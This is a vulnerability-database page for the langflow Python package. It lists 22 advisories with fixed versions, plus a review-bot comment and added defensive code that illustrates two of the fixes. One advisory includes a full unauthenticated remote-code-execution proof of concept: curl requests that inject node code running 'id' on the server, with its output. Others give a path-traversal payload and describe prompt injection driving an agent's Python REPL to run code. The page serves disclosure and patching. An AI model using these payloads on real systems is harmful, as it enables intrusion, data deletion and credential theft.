Package details: pkg:pypi/langflow@0.6.5a4
purl pkg:pypi/langflow@0.6.5a4
Next non-vulnerable version 1.9.1
Latest non-vulnerable version 1.9.1
Risk 10.0
Vulnerabilities affecting this package (22)
Vulnerability Summary Fixed by
VCID-1dek-kvzf-27d1
Aliases:
CVE-2026-34046
GHSA-8c4j-f57c-35cf
Langflow: Authenticated Users Can Read, Modify, and Delete Any Flow via Missing Ownership Check

## Vulnerability

### IDOR in `GET/PATCH/DELETE /api/v1/flow/{flow_id}`

The `_read_flow` helper in `src/backend/base/langflow/api/v1/flows.py` branched on the `AUTO_LOGIN` setting to decide whether to filter by `user_id`. When `AUTO_LOGIN` was `False` (i.e., authentication was enabled), neither branch enforced an ownership check — the query returned any flow matching the given UUID regardless of who owned it.

This exposed any authenticated user to:

- **Read** any other user's flow, including embedded plaintext API keys
- **Modify** the logic of another user's AI agents
- **Delete** flows belonging to other users

The vulnerability was introduced by the conditional logic that was meant to accommodate public/example flows (those with `user_id = NULL`) under auto-login mode, but inadvertently left the authenticated path without an ownership filter.

---

## Fix (PR #8956)

The fix removes the `AUTO_LOGIN` conditional entirely and unconditionally scopes the query to the requesting user:

```diff
- auth_settings = settings_service.auth_settings
- stmt = select(Flow).where(Flow.id == flow_id)
- if auth_settings.AUTO_LOGIN:
-     stmt = stmt.where(
-         (Flow.user_id == user_id) | (Flow.user_id == None)  # noqa: E711
-     )
+ stmt = select(Flow).where(Flow.id == flow_id).where(Flow.user_id == user_id)
```

All three operations — read, update, and delete — route through `_read_flow`, so the single change covers the full attack surface. A cross-user isolation test (`test_read_flows_user_isolation`) was added to prevent regression.

---

## Acknowledgements

Langflow thanks the security researcher who responsibly disclosed this vulnerability:

- **[@chximn-dt](https://github.com/chximn-dt)**
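Review bot: the replacement `stmt` drops the `(Flow.user_id == None)` branch, so flows stored with `user_id = NULL` (the public/example flows the advisory says the conditional was meant to accommodate) are no longer reachable through `_read_flow` at all, even under `AUTO_LOGIN`; if those flows are still expected to be readable, they need an explicit read-only path rather than being folded back into this query, and the regression test should cover a NULL-owner flow alongside the cross-user case.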
1.5.1
Affected by 16 other vulnerabilities.
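To make the ownership bug and the PR #8956 fix concrete, the following added example (not Langflow's code) replays the `_read_flow` logic described above against an in-memory SQLite table and runs a cross-user isolation check in the spirit of `test_read_flows_user_isolation`; the table layout, the `name` column and the user names are constructed for the example.

```python
import sqlite3
import uuid
from typing import Callable, Optional

# Added example, not Langflow's code. The "flow" table mirrors the two columns the
# advisory relies on (id, user_id); "name" is an assumed extra column. Flows with
# user_id = NULL stand in for the public/example flows mentioned in the advisory.

Row = Optional[tuple]
ReadFlow = Callable[[sqlite3.Connection, str, str], Row]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flow (id TEXT PRIMARY KEY, user_id TEXT, name TEXT)")
    return conn


def read_flow_vulnerable(conn: sqlite3.Connection, flow_id: str, user_id: str,
                         auto_login: bool) -> Row:
    """Pre-fix logic: the ownership filter is only added when AUTO_LOGIN is True.
    With real authentication (AUTO_LOGIN=False) the query matches on id alone, so
    any authenticated user can fetch any flow whose UUID they know."""
    sql = "SELECT id, user_id, name FROM flow WHERE id = ?"
    params = [flow_id]
    if auto_login:
        # the branch that was meant to admit public flows (NULL owner) under auto-login
        sql += " AND (user_id = ? OR user_id IS NULL)"
        params.append(user_id)
    return conn.execute(sql, params).fetchone()


def read_flow_fixed(conn: sqlite3.Connection, flow_id: str, user_id: str) -> Row:
    """PR #8956 logic: the query is always scoped to the requesting user."""
    return conn.execute(
        "SELECT id, user_id, name FROM flow WHERE id = ? AND user_id = ?",
        (flow_id, user_id),
    ).fetchone()


def user_isolation_holds(read_flow: ReadFlow) -> bool:
    """Cross-user isolation: the owner can read her flow, a different user cannot."""
    conn = make_db()
    alice_flow = str(uuid.uuid4())
    conn.execute("INSERT INTO flow VALUES (?, ?, ?)", (alice_flow, "alice", "alice agent"))
    owner_ok = read_flow(conn, alice_flow, "alice") is not None
    stranger_blocked = read_flow(conn, alice_flow, "bob") is None
    return owner_ok and stranger_blocked


def public_flow_visible(read_flow: ReadFlow) -> bool:
    """Whether a flow with user_id = NULL is still reachable through the helper.
    The fixed query answers False: public flows need their own explicit path."""
    conn = make_db()
    public_flow = str(uuid.uuid4())
    conn.execute("INSERT INTO flow VALUES (?, NULL, ?)", (public_flow, "example"))
    return read_flow(conn, public_flow, "alice") is not None


if __name__ == "__main__":
    variants = [
        ("pre-fix, AUTO_LOGIN=False", lambda c, f, u: read_flow_vulnerable(c, f, u, False)),
        ("pre-fix, AUTO_LOGIN=True", lambda c, f, u: read_flow_vulnerable(c, f, u, True)),
        ("PR #8956", read_flow_fixed),
    ]
    for label, fn in variants:
        print(f"{label}: isolation={user_isolation_holds(fn)} "
              f"public_visible={public_flow_visible(fn)}")
```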
VCID-1ynd-c2hz-53hx
Aliases:
CVE-2026-27966
GHSA-3645-fxcv-hqr4
Langflow has Remote Code Execution in CSV Agent The CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE). There are no reported fixed by versions.
VCID-2195-gd33-xbdp
Aliases:
CVE-2026-42048
GHSA-9whx-c884-c68q
Langflow Knowledge Bases API is Vulnerable to Path Traversal

## Summary

Langflow is vulnerable to Path Traversal in the Knowledge Bases API (`DELETE /api/v1/knowledge_bases`). This occurs because user-supplied knowledge base names are concatenated directly into file paths without proper sanitization or boundary validation. An authenticated attacker can exploit this flaw to delete arbitrary directories anywhere on the server's filesystem, leading to data loss and potential service disruption.

## Details

The vulnerability exists in the `delete_knowledge_bases_bulk` function within `src/backend/base/langflow/api/v1/knowledge_bases.py`. This function constructs file paths directly from the user-supplied `kb_names` parameter. While other knowledge base endpoints safely route through standard path resolution (e.g., `_resolve_kb_path()`), the bulk delete handler bypasses this entirely. It builds the path manually and passes it directly to `shutil.rmtree()` without validating whether the resulting path resolves outside the intended user directory.

## PoC (Proof of Concept)

For the **Bulk Delete** endpoint, an authenticated attacker can supply a traversal sequence in the `kb_names` parameter: `../victim_user/kb_name`

Because the path is passed directly to `shutil.rmtree()` without containment checks, this payload deletes directories outside the intended scope.

## Impact

Any Langflow instance exposing this endpoint to authenticated users is vulnerable. This exposes the server to:

* **Cross-user data compromise:** Deletion of directories within another tenant's knowledge base space.
* **Arbitrary filesystem manipulation:** Directory deletion at any path on the server where the application has write permissions.
* **Service disruption & Data Loss:** Deletion of critical application files or unrecoverable data loss if backups are co-located on the same filesystem.

## Fixes

The issue was addressed in **PR #12243**, which applies `Path.resolve()` to normalize the supplied path and validates that it starts with the authenticated user's directory before deletion. Subsequent updates (backported from PR #12337) introduced robust containment checks using `Path.is_relative_to()` to prevent prefix-ambiguity bugs.

## Acknowledgements

Thanks to the security researchers who responsibly disclosed this vulnerability:

* @ddlxstudio
* @nekros1xx
1.9.0
Affected by 1 other vulnerability.
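The advisory's fix history (a `Path.resolve()` plus prefix comparison, later replaced by `Path.is_relative_to()` because of prefix ambiguity) is easiest to see side by side. The following added example is not Langflow's code: the storage root and user directory are constructed, the functions only return the path that would be handed to `shutil.rmtree()` (or `None` to refuse), and nothing is deleted.

```python
from __future__ import annotations

from pathlib import Path

# Added example, not Langflow's code. It contrasts three ways of turning a request-
# supplied knowledge-base name into a filesystem path inside a per-user directory:
# no check (the vulnerable pattern), a string-prefix check after Path.resolve()
# (PR #12243 style) and a component-wise check with Path.is_relative_to()
# (PR #12337 style). Paths below are constructed and need not exist.

KB_ROOT = Path("/srv/langflow/knowledge_bases")  # constructed storage root
USER_DIR = KB_ROOT / "user1"                      # the authenticated user's directory


def kb_path_unchecked(user_dir: Path, kb_name: str) -> Path:
    """Vulnerable pattern: the name is joined straight into the path.
    '../victim_user/kb_name' escapes user_dir; an absolute name replaces it."""
    return user_dir / kb_name


def kb_path_prefix_check(user_dir: Path, kb_name: str) -> Path | None:
    """Prefix check: resolve() collapses '..' and follows symlinks, then the string
    prefix is compared. Plain traversal is refused, but siblings sharing a prefix
    are not: '/x/user10/kb' starts with '/x/user1'."""
    base = user_dir.resolve()
    candidate = (base / kb_name).resolve()
    return candidate if str(candidate).startswith(str(base)) else None


def kb_path_contained(user_dir: Path, kb_name: str) -> Path | None:
    """Containment check: is_relative_to() compares whole path components, so the
    shared-prefix sibling is rejected. The base itself is refused too, so an
    empty or '.' name cannot remove the user's entire directory."""
    base = user_dir.resolve()
    candidate = (base / kb_name).resolve()
    if candidate == base or not candidate.is_relative_to(base):
        return None
    return candidate


def compare(kb_name: str) -> dict[str, str | None]:
    """What each strategy would pass to shutil.rmtree() for one request value."""
    prefix = kb_path_prefix_check(USER_DIR, kb_name)
    contained = kb_path_contained(USER_DIR, kb_name)
    return {
        "unchecked": str(kb_path_unchecked(USER_DIR, kb_name)),
        "prefix": None if prefix is None else str(prefix),
        "contained": None if contained is None else str(contained),
    }


if __name__ == "__main__":
    # constructed request values: a normal name, the advisory's traversal payload,
    # a shared-prefix sibling, an absolute path and an empty name
    for name in ("my_kb", "../victim_user/kb_name", "../user10/kb", "/etc", ""):
        print(repr(name), compare(name))
```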
VCID-2649-thqq-r3d2
Aliases:
CVE-2026-6599
GHSA-v66p-f7x3-4794
Langflow vulnerable to injection A vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function get_client_ip/install_mcp_config of the file src/backend/base/langflow/api/v1/mcp_projects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument X-Forwarded-For results in injection. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
1.8.4
Affected by 6 other vulnerabilities.
VCID-9k4q-zwxf-euh1
Aliases:
CVE-2024-9277
GHSA-355v-2rjx-fpx7
Inefficient Regular Expression Complexity in langflow A vulnerability classified as problematic was found in Langflow up to 1.0.18. Affected by this vulnerability is an unknown functionality of the file \src\backend\base\langflow\interface\utils.py of the component HTTP POST Request Handler. The manipulation of the argument remaining_text leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. There are no reported fixed by versions.
VCID-bb6r-1f6u-t7ed
Aliases:
CVE-2025-68477
GHSA-5993-7p27-66g5
Langflow vulnerable to Server-Side Request Forgery

**Vulnerability Overview**

Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.

Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.

**Vulnerable Code**

1. When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.
1.7.1
Affected by 11 other vulnerabilities.
VCID-ef87-295y-zbha
Aliases:
CVE-2024-37014
GHSA-qg33-x2c5-6p44
PYSEC-2024-177
Langflow through 0.6.19 allows remote code execution if untrusted users are able to reach the "POST /api/v1/custom_component" endpoint and provide a Python script.
1.0.0a3
Affected by 22 other vulnerabilities.
1.0.15
Affected by 21 other vulnerabilities.
VCID-fc5h-qc2t-xqc3
Aliases:
CVE-2025-57760
GHSA-4gv9-mp8m-592r
Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE) A privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command **langflow superuser** to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.
1.5.1
Affected by 16 other vulnerabilities.
VCID-jt18-vv56-2fgx
Aliases:
CVE-2024-48061
GHSA-5p5r-57fx-pmfr
Langflow vulnerable to remote code execution langflow <=1.0.18 is vulnerable to Remote Code Execution (RCE) as any component provided the code functionality and the components run on the local machine rather than in a sandbox.
1.0.19
Affected by 19 other vulnerabilities.
VCID-ncvf-vzqr-uydz
Aliases:
CVE-2026-33497
GHSA-ph9w-r52h-28p7
PYSEC-2026-81
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.1, in the download_profile_picture function of the /profile_pictures/{folder_name}/{file_name} endpoint, the folder_name and file_name parameters are not strictly filtered, which allows the secret_key to be read across directories. Version 1.7.1 contains a patch.
1.7.1
Affected by 11 other vulnerabilities.
VCID-q4r1-xjfk-7bg9
Aliases:
CVE-2026-33053
GHSA-rf6x-r45m-xv3w
PYSEC-2026-78
Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the delete_api_key_route() endpoint accepts an api_key_id path parameter and deletes it with only a generic authentication check (get_current_active_user dependency). However, the delete_api_key() CRUD function does NOT verify that the API key belongs to the current user before deletion.
1.7.2
Affected by 11 other vulnerabilities.
1.9.0
Affected by 1 other vulnerability.
VCID-qwtw-q92t-quhz
Aliases:
CVE-2026-21445
GHSA-c5cp-vx83-jhqx
Langflow Missing Authentication on Critical API Endpoints Multiple critical API endpoints in Langflow are missing authentication controls, allowing any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.
1.7.1
Affected by 11 other vulnerabilities.
VCID-rc54-gw71-gyau
Aliases:
CVE-2026-0770
GHSA-g22f-v6f7-2hrh
Langflow affected by Remote Code Execution via validate_code() exec() Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325. There are no reported fixed by versions.
VCID-s17d-sfjq-z7eg
Aliases:
CVE-2024-42835
GHSA-56m6-4mhw-h3g5
PYSEC-2024-279
langflow v1.0.12 was discovered to contain a remote code execution (RCE) vulnerability via the PythonCodeTool component.
1.0.13
Affected by 21 other vulnerabilities.
VCID-sbea-kkfu-akgb
Aliases:
CVE-2025-68478
GHSA-f43r-cc68-gpx4
PYSEC-2025-125
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue.
1.7.0
Affected by 15 other vulnerabilities.
1.7.1
Affected by 11 other vulnerabilities.
VCID-u8mw-7znw-rfab
Aliases:
CVE-2026-6597
GHSA-5jjf-wcvf-923w
Langflow has an Information Leak through Incomplete API Key Redaction A weakness has been identified in langflow-ai langflow up to 1.8.3. Impacted is the function remove_api_keys/has_api_terms of the file src/backend/base/langflow/api/utils/core.py of the component Flow Using API. This manipulation causes unprotected storage of credentials. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
1.8.4
Affected by 6 other vulnerabilities.
VCID-v5pc-pdm9-97g8
Aliases:
CVE-2026-33873
GHSA-v8hw-mh8c-jxfc
PYSEC-2026-82
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assistant feature in Langflow executes LLM-generated Python code during its validation phase. Although this phase appears intended to validate generated component code, the implementation reaches dynamic execution sinks and instantiates the generated class server-side. In deployments where an attacker can access the Agentic Assistant feature and influence the model output, this can result in arbitrary server-side Python execution. Version 1.9.0 fixes the issue.
1.9.0
Affected by 1 other vulnerability.
VCID-wv26-29b9-vqgg
Aliases:
CVE-2025-3248
GHSA-rvqx-wpfh-mfx7
PYSEC-2025-36
Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
1.3.0
Affected by 18 other vulnerabilities.
VCID-ypxh-x2hy-3uhb
Aliases:
CVE-2026-6598
GHSA-9jpj-cph8-w449
Langflow: Cleartext Storage of Authentication Settings in Project Creation Endpoint A security vulnerability has been detected in langflow-ai langflow up to 1.8.3. The affected element is the function create_project/encrypt_auth_settings of the file src/backend/base/Langflow/api/v1/projects.py of the component Project Creation Endpoint. Such manipulation of the argument auth_settings leads to cleartext storage in a file or on disk. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
1.9.1
Affected by 0 other vulnerabilities.
VCID-ysnc-jyxb-6qcy
Aliases:
CVE-2025-34291
GHSA-577h-p2hh-v4mv
PYSEC-2025-78
Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account takeover and remote code execution. An overly permissive CORS configuration (allow_origins='*' with allow_credentials=True) combined with a refresh token cookie configured as SameSite=None allows a malicious webpage to perform cross-origin requests that include credentials and successfully call the refresh endpoint. An attacker-controlled origin can therefore obtain fresh access_token / refresh_token pairs for a victim session. Obtained tokens permit access to authenticated endpoints — including built-in code-execution functionality — allowing the attacker to execute arbitrary code and achieve full system compromise.
1.7.0
Affected by 15 other vulnerabilities.
VCID-zqwj-45w7-7kft
Aliases:
CVE-2026-33017
GHSA-vwmf-pq79-vjvx
Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint

## Summary

The `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution.

This is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.

## Affected Code

### Vulnerable Endpoint (No Authentication)

**File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657

```python
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,  # ATTACKER CONTROLLED
    request: Request,
    # ... NO Depends(get_current_active_user) -- MISSING AUTH ...
):
    """Build a public flow without requiring authentication."""
    client_id = request.cookies.get("client_id")
    owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)
    job_id = await start_flow_build(
        flow_id=new_flow_id,
        data=data,  # Attacker's data passed directly to graph builder
        current_user=owner_user,
        ...
    )
```

Compare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`.

### Code Execution Chain

When attacker-supplied `data` is provided, it flows through:

1. `start_flow_build(data=attacker_data)` → `generate_flow_events()` -- `build.py:81`
2. `create_graph()` → `build_graph_from_data(payload=data.model_dump())` -- `build.py:298`
3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168`
4. `add_nodes_and_edges()` → `initialize()` → `_build_graph()` -- `base.py:270,527`
5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323`
6. `vertex.instantiate_component()` → `instantiate_class(vertex)` -- `loading.py:28`
7. `code = custom_params.pop("code")` extracts attacker code -- `loading.py:43`
8. `eval_custom_component_code(code)` → `create_class(code, class_name)` -- `eval.py:9`
9. `prepare_global_scope(module)` -- `validate.py:323`
10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397`

### Unsandboxed exec() in prepare_global_scope

**File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397

```python
def prepare_global_scope(module):
    exec_globals = globals().copy()
    # Imports are resolved first (any module can be imported)
    for node in imports:
        module_obj = importlib.import_module(module_name)  # line 352
        exec_globals[variable_name] = module_obj
    # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)
    if definitions:
        combined_module = ast.Module(body=definitions, type_ignores=[])
        compiled_code = compile(combined_module, "<string>", "exec")
        exec(compiled_code, exec_globals)  # line 397 - ARBITRARY CODE EXECUTION
```

**Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker's code like `_x = os.system("id")` is an assignment and will be executed during graph building -- before the flow even "runs."

## Prerequisites

1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows)
2. Attacker knows the public flow's UUID (discoverable via shared links/URLs)
3. No authentication required -- only a `client_id` cookie (any arbitrary string value)

When `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker:

1. `GET /api/v1/auto_login` → obtain superuser token
2. `POST /api/v1/flows/` → create a public flow
3. Exploit via `build_public_tmp` without any auth

## Proof of Concept

### Tested Against

- **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`)
- **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each)

### Step 1: Obtain a Public Flow ID

(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)

```bash
# Get superuser token (no credentials needed when AUTO_LOGIN=true)
TOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token')

# Create a public flow
FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"test","data":{"nodes":[],"edges":[]},"access_type":"PUBLIC"}' \
  | jq -r '.id')
echo "Public Flow ID: $FLOW_ID"
```

### Step 2: Exploit -- Unauthenticated RCE

```bash
# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint
# NO Authorization header, NO API key, NO credentials
curl -X POST "http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \
  -H "Content-Type: application/json" \
  -b "client_id=attacker" \
  -d '{
    "data": {
      "nodes": [{
        "id": "Exploit-001",
        "type": "genericNode",
        "position": {"x":0,"y":0},
        "data": {
          "id": "Exploit-001",
          "type": "ExploitComp",
          "node": {
            "template": {
              "code": {
                "type": "code",
                "required": true,
                "show": true,
                "multiline": true,
                "value": "import os, socket, json as _json\n\n_proof = os.popen(\"id\").read().strip()\n_host = socket.gethostname()\n_write = open(\"/tmp/rce-proof\",\"w\").write(f\"{_proof} on {_host}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})",
                "name": "code",
                "password": false,
                "advanced": false,
                "dynamic": false
              },
              "_type": "Component"
            },
            "description": "X",
            "base_classes": ["Data"],
            "display_name": "ExploitComp",
            "name": "ExploitComp",
            "frozen": false,
            "outputs": [{"types":["Data"],"selected":"Data","name":"o","display_name":"O","method":"r","value":"__UNDEFINED__","cache":true,"allows_loop":false,"tool_mode":false,"hidden":null,"required_inputs":null,"group_outputs":false}],
            "field_order": ["code"],
            "beta": false,
            "edited": false
          }
        }
      }],
      "edges": []
    },
    "inputs": null
  }'
```

### Step 3: Verify Code Execution

```bash
# Wait 2 seconds for async graph building
sleep 2

# Check proof file written by attacker's code on the server
cat /tmp/rce-proof
# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali
```

### Actual Test Results

```
======================================================================
LANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST
======================================================================
Version: Langflow 1.7.3

RUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19
*** REMOTE CODE EXECUTION CONFIRMED ***
canary: RCE-f0d19b36
hostname: kali
uid: 1000
whoami: aviral
id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...
uname: Linux 6.16.8+kali-amd64

RUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832
*** REMOTE CODE EXECUTION CONFIRMED ***
canary: RCE-6037a271

RUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7
*** REMOTE CODE EXECUTION CONFIRMED ***
canary: RCE-4a796556

FINAL RESULTS
Total checks: 15
VULNERABLE: 15
SAFE: 0
RCE confirmed: 3/3 runs
Reproducible: YES (100%)
```

## Impact

- **Unauthenticated Remote Code Execution** with full server process privileges
- **Complete server compromise**: arbitrary file read/write, command execution
- **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)
- **Reverse shell access** for persistent access
- **Lateral movement** within the network
- **Data exfiltration** from all flows, messages, and stored credentials in the database

## Comparison with CVE-2025-3248

| Aspect | CVE-2025-3248 | This Vulnerability |
|--------|--------------|-------------------|
| **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` |
| **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability |
| **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param |
| **Code execution via** | `validate_code()` → `exec()` | `create_class()` → `prepare_global_scope()` → `exec()` |
| **CISA KEV** | Yes (actively exploited) | N/A (new finding) |
| **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed |

## Recommended Fix

### Immediate (Short-term)

**Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data:

```python
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,
    # REMOVED: data parameter -- public flows must use stored data only
    ...
):
```

In `generate_flow_events` → `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests:

```python
async def create_graph(fresh_session, flow_id_str, flow_name):
    # For public flows, ALWAYS load from database, never from user data
    return await build_graph_from_db(
        flow_id=flow_id,
        session=fresh_session,
        ...
    )
```

There are no reported fixed by versions.
VCID-ztx2-wefa-c7bk
Aliases:
GHSA-c995-4fw3-j39m
Duplicate Advisory: Langflow Vulnerable to Code Injection via the `/api/v1/validate/code` endpoint

### Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-rvqx-wpfh-mfx7. This link is maintained to preserve external references.

### Original Description

Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/v1/validate/code` endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
1.3.0
Affected by 18 other vulnerabilities.
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

Date Actor Action Vulnerability Source VulnerableCode Version
2026-06-06T08:26:21.245474+00:00 GitLab Importer Affected by VCID-2195-gd33-xbdp https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-42048.yml 38.6.0
2026-06-06T08:14:03.120059+00:00 GitLab Importer Affected by VCID-ypxh-x2hy-3uhb https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-6598.yml 38.6.0
2026-06-06T08:14:01.006469+00:00 GitLab Importer Affected by VCID-2649-thqq-r3d2 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-6599.yml 38.6.0
2026-06-06T08:13:59.533473+00:00 GitLab Importer Affected by VCID-u8mw-7znw-rfab https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-6597.yml 38.6.0
2026-06-06T07:37:56.084009+00:00 GitLab Importer Affected by VCID-1dek-kvzf-27d1 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-34046.yml 38.6.0
2026-06-06T07:35:18.452864+00:00 GitLab Importer Affected by VCID-v5pc-pdm9-97g8 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-33873.yml 38.6.0
2026-06-06T07:31:32.543916+00:00 GitLab Importer Affected by VCID-ncvf-vzqr-uydz https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-33497.yml 38.6.0
2026-06-06T07:30:44.666760+00:00 GitLab Importer Affected by VCID-q4r1-xjfk-7bg9 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-33053.yml 38.6.0
2026-06-06T07:29:43.336649+00:00 GitLab Importer Affected by VCID-zqwj-45w7-7kft https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-33017.yml 38.6.0
2026-06-06T07:06:17.691971+00:00 GitLab Importer Affected by VCID-1ynd-c2hz-53hx https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-27966.yml 38.6.0
2026-06-06T06:44:39.430171+00:00 GitLab Importer Affected by VCID-rc54-gw71-gyau https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-0770.yml 38.6.0
2026-06-06T06:34:18.230607+00:00 GitLab Importer Affected by VCID-qwtw-q92t-quhz https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2026-21445.yml 38.6.0
2026-06-06T06:32:55.058578+00:00 GitLab Importer Affected by VCID-bb6r-1f6u-t7ed https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2025-68477.yml 38.6.0
2026-06-06T06:32:45.090511+00:00 GitLab Importer Affected by VCID-sbea-kkfu-akgb https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2025-68478.yml 38.6.0
